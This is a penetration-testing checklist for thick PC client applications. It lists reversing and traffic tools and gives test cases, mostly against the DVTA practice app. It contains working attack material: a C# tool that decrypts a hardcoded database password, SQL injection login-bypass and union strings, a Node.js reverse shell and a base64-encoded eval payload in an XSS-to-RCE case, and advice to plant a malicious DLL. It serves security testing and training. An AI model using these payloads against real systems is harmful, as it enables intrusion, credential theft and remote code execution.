Title: Penetration Test C Client (C-S Architecture) checklist

0x00 Introduction

This project mainly targets penetration testing of PC client (CS architecture), combining its own testing experience and network data to form a checklist. If you have any questions, please contact us and look forward to everyone to contribute more skills and cases.

0x01 Overview

PC client, GUI with rich functions, C-S architecture.

0x02 Development Language

C# (.NET), JAVA, DELPHI, C, C++.

0x03 Protocol

TCP, HTTP(S), TDS.

0x04 Database

oracle, mssql, db2.

0x05 Test Tool

//Related tools download: https://github.com/theLSA/hack-cs-tools

dvta: pc client shooting range

ida pro: Static analysis tool

ollydbg: Dynamic Analysis Tool

CFF Explorer: PE file analysis

PEID: Shell Check Tool

exeinfope/studype: pe file analysis

wireshark: Observe traffic

tcpview: Observe tcp traffic

echo Mirage: can intercept tcp traffic

burpsuite: http(s) packet capture

proxifier: Global proxy traffic

procmon: File and Registry Monitoring

regshot: registry changes comparison

process Hacker: process analysis

RegfromApp: Registry Monitoring

WSExplorer: Year Alliance Process Packet Catching Tool

strings: view the program's string

.net[anti]compilation:

dotpeek

de4dot

dnspy

ilspy

sae

ildasm

ilasm

Java Decompilation

jad

jd-gui

jadx

dex2jar

Online version:

javare.cn

www.javadecompilers.com

Reflexil: Assembly editor (can be used as an ilspy plugin)

Vcg: Automated code auditing tool

BinScope: BinScope

0x06 Agent Settings

Most clients do not have proxy configuration function and need to set up global proxy by themselves, as follows:

1) IE-internet settings-connection-LAN settings.

2) proxifier -- proxy server/proxification rules

//Http's traffic can be combined with burpsuite for easy testing (proxy server is set to burp proxy address).

0x07 Test Point

0. Information Collection

Compilation information, development environment/language, usage protocol, database, ip, obfuscation/encryption, whether to shell, etc.

Case 0-CFF view client information (such as compilation environment)

dvta

1. Reverse Engineering

Decompile, source code leakage, hardcoded key/password, encrypted and decrypted logic, role judgment logic (0-admin, 1-normaluser), backdoor, etc.

Case 0 - Decompile to obtain encryption and decryption logic and write decryption tools

dvta

Information obtained through this logic and Encrypted Text:CTsvjZ0jQghXYWbSRcPxpQ==

AES KEY:J8gLXc454o5tW2HEF7HahcXPufj9v8k8

IV:fq20T0gMnXa6g0l4

Write decryption tools

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data;

using System.Drawing;

using System.Linq;

using System.Text;

using System.Threading.Tasks;

using System.Windows.Forms;

using System.Security.Cryptography;

namespace aesdecrypt

{

public partial class aesdecrypt : Form

{

public aesdecrypt()

{

InitializeComponent();

}

private void decrypt(object sender, EventArgs e)

{

String key="J8gLXc454o5tW2HEF7HahcXPufj9v8k8";

String IV="fq20T0gMnXa6g0l4";

String encryptedtext="CTsvjZ0jQghXYWbSRcPxpQ==";

byte[] encryptedBytes=Convert.FromBase64String(encryptedtext);

AesCryptoServiceProvider aes=new AesCryptoServiceProvider();

aes.BlockSize=128;

aes.KeySize=256;

aes.Key=System.Text.ASCIIEncoding.ASCII.GetBytes(key);

aes.IV=System.Text.ASCIIEncoding.ASCII.GetBytes(IV);

aes.Padding=PaddingMode.PKCS7;

aes.Mode=CipherMode.CBC;

ICryptoTransform crypto=aes.CreateDecryptor(aes.Key, aes.IV);

byte[] decryptedbytes=crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);

String decryptedString=System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);

Console.WriteLine("\n");

Console.WriteLine("################Decrypt Database password############\n");

Console.WriteLine("Decrypted Database password:" + decryptedString+"\n");

Console.WriteLine("################Done###############\n");

}

}

}

//The decryption code originated from https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article

Case 1 - Decompile and modify the code logic to allow ordinary users to log in as administrators

dvta

1-Isadmin

0-Normaluser

Change 1 to 0 to determine admin

2. Information leakage

Plain text sensitive information, sensitive files (such as xxx.config in the installation directory).

Registry: Use regshot to compare the differences in registry before and after client runs (such as login).

Development and debug log leaks (such as dvta.exe log.txt)

The process hacker views plain text sensitive data (such as account password/key) in the client memory.

strings directly view client strings (such as ip information).

View source code (such as github, gitee, etc.)

Case 0-Configuration sensitive information leakage

dvta

Case 1-Memory leak database account password

dvta

Case 2-The source code contains hard-coded ftp account password

dvta

Case 3-Development and debugging log leak

dvta

Case 4 - Save the account password locally after logging in to a certain system //This case comes from https://blog.csdn.net/weixin_30685047/article/details/95916065

3. Transmission traffic

wireshark/echo Mirage/burpsuite+nopeproxy/fillder/charles

Account password transmitted in plain text by protocols such as ftp

SQL statement plaintext transmission (such as using construct injection, overprivileges, etc.)

Case 0 - Zhengfang Academic Affairs System SQL statement transmission plain text, return plain text data

//This case comes from wooyu

Case 1-The data packet returns the database account password at a certain system login

4. Other vulnerabilities

Username enumeration

Case 0

Brute force cracking

Such as login function.

Case 0

Weak password

You can try admin 123456, etc.

Personal clear text transmission

SQL statement exposed

Case 0

Case 1

SQL Injection

If login, universal password

xxx’ or ‘x’=’x

xxx’ or 1=1--

At the input box, construct a closed error, such as ', '), %'), order by 100---, etc.

The data is injected using display bits or errors. The principle is the same as web injection, and different databases are similar.

Case 0-oracle injection

' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

Case 1-mssql injection

111') and (select user)0--

CSV injection

If you export excel, enter 1+1 and see if it is 2 after exporting.

XSS

Such as Electron, NodeWebKit, etc.

Case 0-Chinese Ant Sword xss to RCE

Environment: win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5

xss webshell:

?php

header('HTTP/1.1 500 img src=# onerror=alertx');

windows+node.js:

success

var net=require('net'), sh=require('child_process').exec('cmd.exe');

var client=new net.Socket();

client.connect(6677, '127.0.0.1', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);

sh.stderr.pipe(client);});

?php

header('HTTP/1.1 500 Not img src=# onerror='eval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVj dCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=,base64).toString())'');

Related reference

https://www.anquanke.com/post/id/176379

Command execution

Case 0-Evernote Windows Client 6.15 Local file reading and remote command execution http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/

Case 1-A cloud pc client command execution mining process

https://www.secpulse.com/archives/53852.html

Case 2-Kingsoft WPS Mail Mail Client Remote Command Execution Vulnerability (Mozilla-based XUL Program Utilization Tips)

https://shuimugan.com/bug/view?bug_no=193117

The test points are the same as the web.

DLL hijacks Linux file search order:

Current directory PATH order value directory program search Dll order:

//No absolute path is provided

1. The directory where the application loads.

2. Current directory.

3. System directory (C:\Windows\System32\).

4.16-bit system directory.

5. Windows directory.

6. Directory of PATH variable.

The program can load malicious dlls placed by the attacker.

Use procmon to search for the dll loaded by the program and observe the name not found.

msf generates malicious dlls and places them at the program loading location. Running the program can trigger payload.

Case 0-dll hijacking

dvta

Logistic defect

The test point is the same as the web.

Authorization and certification defect

Registry key value, authorization server returns information construction.

Related reference

https://cloud.tencent.com/developer/article/1430899

Unauthorized

Case 0-Arbitrary operation of Zhengfang Academic Affairs System Database

You can take over the database by knowing IP